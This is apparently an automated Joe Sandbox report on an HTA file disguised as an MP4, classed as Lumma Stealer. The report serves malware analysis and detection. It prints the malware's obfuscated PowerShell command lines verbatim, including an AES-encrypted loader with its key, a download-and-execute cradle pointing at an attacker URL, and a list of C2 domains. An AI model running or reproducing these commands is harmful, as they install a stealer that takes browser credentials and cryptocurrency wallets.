Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Poket.mp4.hta

Overview

General Information

Sample name:Poket.mp4.hta
Analysis ID:1582671
MD5:9fb3db7b334f385701b3c88d63b7e5ee
SHA1:d901cd79292cf0f31db2f1c83a62460e1f6a1ef5
SHA256:658d84007977b9bcbac196d09ec012e15dba6d71f026613bb08e3a0ec4aceef8
Tags:EmmenhtalFakeCaptchaFakeMP4htauser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
Yara detected MSILLoadEncryptedAssembly
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 6748 cmdline: mshta.exe "C:\Users\user\Desktop\Poket.mp4.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 4108 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3D0330D3F3E88BE2C45BB0C420751EC6D9A4B10B354AA9B10D7039997896CBC84E96ED894759B7F6EC303D431A1C284E80B0F41DD7B7095C39DFA3FFA3C5DAC6503E4E7D2A9357E4D1035C7529DAF56510661E0073D0774CC37C6D50823062C71BD864FA83B7C62B39136EF3D2B925C41C459527BD11BD88B2C0EFB234AF3A9BEC1D80B39780B48025DFF5F6C178B93DDF712850D1DF01DDF854BCDC17A251FF77FCE0C9538100E20B760941EB486C522975B34051141DC18EF0568AFA1572E0FA83A5BC2690D31086904583C27EE9C817B126F2253CF3CCD1704914D8640C18CA31D535669F9FD6A603DD53F72A57B9CD5430327727286E7BAAD13A6FFC39662E283A7FF978BFBF5FC5CC5AD1B6532DAD68D41E04F618D40AF75F747B2981066564E6D25416F3791017B463E698B280398C63BC8933C29AF09616A94C3BEA7D4DB384704BEC738B9921BF8898C01D30527E0AC949344494C49B43088E1CCC8686C23391F17452B02D5B81B43B2D2C06B9F16A23E9E9D87814CE2370D93C6FA82BA38C67929FD4899A473FE61DC37CA5A87F2EF8787A58DFA80CAB07CA991B121E35B8C81230AE958AE8E041C71E8D01DDBA8E8B5FC137E517D861E573DDF771C76B9FF74293555133275E31FC6A9DD69E2383D6D68BA4A50C71EB2A01AC0D83ED9D780D8E2C705249A5FB8BFE6075BF00425C865366BF8B7520989948982EC086CB930C60BFD2A43919A6D60A56DB6D5147D44BDA26305E434FBAEB0372ECFF4AF87A4D8C4C335E58BEF871285E7EB21F6E254351190F01B546758AEB96D90EAC30AE12B03A24FC2F97D3E421D8714C4CBAC8A57055D7B008B6C2BAF399731AA3200F812001847FB33B62F48E736887780A85C4673F47E7ED462E33E1548C32D0267151021174D334A2D5A504C69A4558F49E6F1B0219CB89D4B6D3773C0D9D1AD71754E9FF3938CBBCBFFEDDE23BA04DCE969E1D8B3904AFA17A972C310F35BCF0D222510068B1DCA603907C82B4E210FDBC369FFFC25846BB4F20E2859617B32043C903816DE80A42B6E9E87F83C3747BFD728BBC1280E82110C8C4979D26AB88E59076F703E098EF3965B72D2B9804D2E94D41B50BC31EF628704BFC95A21A38302980725E11668416D8B1446E5D0C6855E9EA62636E456872FA1A80C8E4410D6871AF6AE9E0E601497E4F1A7F61DC6F43E939B216392102D05EE16C0164C7B92D9CC1CCC6D70E28514EE6924ECEAD49A161ABD47DF4A06F7ED617E02E525D5118BC8244B9298001EAA02AA3874785A6BFCDF3F8DF9DF76F9DBC541CF7B1A069EEB3CB9550D16');$IoNU=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((FRsZn('444C5A775845534878786D7A6C446679')),[byte[]]::new(16)).TransformFinalBlock($VUQBu,0,$VUQBu.Length)); & $IoNU.Substring(0,3) $IoNU.Substring(129) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6272 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 2536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5956 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["wholersorie.shop", "noisycuttej.shop", "imbibelubmbe.click", "tirepublicerj.shop", "abruptyopsn.shop", "framekgirus.shop", "cloudewahsj.shop", "rabidcowse.shop", "nearycrepso.shop"], "Build id": "jMw1IE--SHELLS"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000004.00000002.2542046628.00000000069E0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Process Memory Space: powershell.exe PID: 4108INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x1d14fa:$b1: ::WriteAllBytes(
        • 0x1d20a1:$b1: ::WriteAllBytes(
        • 0x15576:$s1: -join
        • 0x1fad5:$s1: -join
        • 0x36c32:$s1: -join
        • 0x42d6f:$s1: -join
        • 0x4fe44:$s1: -join
        • 0x53216:$s1: -join
        • 0x538c8:$s1: -join
        • 0x553b9:$s1: -join
        • 0x575bf:$s1: -join
        • 0x57de6:$s1: -join
        • 0x58656:$s1: -join
        • 0x58d91:$s1: -join
        • 0x58dc3:$s1: -join
        • 0x58e0b:$s1: -join
        • 0x58e2a:$s1: -join
        • 0x5967a:$s1: -join
        • 0x597f6:$s1: -join
        • 0x5986e:$s1: -join
        • 0x59901:$s1: -join
        Process Memory Space: powershell.exe PID: 6272JoeSecurity_MSIL_Load_Encrypted_AssemblyYara detected MSIL_Load_Encrypted_AssemblyJoe Security
          Process Memory Space: powershell.exe PID: 6272INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x286280:$b2: ::FromBase64String(
          • 0xa74048:$b2: ::FromBase64String(
          • 0x2860f8:$s1: -join
          • 0x911496:$s1: -join
          • 0x91e56b:$s1: -join
          • 0x92193d:$s1: -join
          • 0x921fef:$s1: -join
          • 0x923ae0:$s1: -join
          • 0x925ce6:$s1: -join
          • 0x92650d:$s1: -join
          • 0x926d7d:$s1: -join
          • 0x9274b8:$s1: -join
          • 0x9274ea:$s1: -join
          • 0x927532:$s1: -join
          • 0x927551:$s1: -join
          • 0x927da1:$s1: -join
          • 0x927f1d:$s1: -join
          • 0x927f95:$s1: -join
          • 0x928028:$s1: -join
          • 0x92828e:$s1: -join
          • 0x92a424:$s1: -join
          decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            SourceRuleDescriptionAuthorStrings
            4.2.powershell.exe.69e0000.0.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

              System Summary

              barindex
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3D0330D3F3E88BE2C45BB0C420751EC6D9A4B10B354AA
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BD
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3D0330D3F3E88BE2C45BB0C420751EC6D9A4B10B354AA
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = 